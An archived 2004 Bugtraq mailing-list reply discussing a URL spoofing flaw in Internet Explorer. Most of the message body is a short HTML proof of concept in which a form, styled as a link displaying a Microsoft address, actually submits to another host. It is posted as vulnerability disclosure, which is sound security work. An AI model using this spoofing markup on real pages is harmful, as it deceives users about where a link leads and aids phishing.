Re: New URL spoofing bug in Microsoft Internet Explorer

To: <bugtraq@xxxxxxxxxxxxxxxxx>
Subject: Re: New URL spoofing bug in Microsoft Internet Explorer
From: "http-equiv@xxxxxxxxxx " <1@xxxxxxxxxxx>
Date: Sat, 30 Oct 2004 18:16:07 -0000
Cc: <NTBugtraq@xxxxxxxxxxxxxxxxxxxxxx>
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm
Reply-to: 1@xxxxxxxxxxx


I also want to play

<base href="http://www.microsoft.com";>

<a href=><form action="http://www.malware.com"; 
method="get"><INPUT style="BORDER-RIGHT: 0pt; BORDER-TOP: 0pt; 
FONT-SIZE: 10pt; BORDER-LEFT: 0pt;
CURSOR: hand; COLOR: blue; BORDER-BOTTOM: 0pt; BACKGROUND-COLOR: 
transparent;TEXT-DECORATION: underline" type=submit 
value=http://www.microsoft.com></form></a>

This still works in IE 6 SP2 XP 123 whatever, since patched and 
from back in March 2004 [see: 
http://www.securityfocus.com/bid/10023 ]. Only difference being 
the base href and open a href.

http://www.malware.com/mwaresoft.html

Interestingly Outlook Express gets it right this time.



-- 
http://www.malware.com

Prev by Date: RE: New URL spoofing bug in Microsoft Internet Explorer
Next by Date: New Whitepaper - "Second-order Code Injection Attacks"
Previous by thread: Re: New URL spoofing bug in Microsoft Internet Explorer
Next by thread: Re: New URL spoofing bug in Microsoft Internet Explorer
Index(es):
- Date
- Thread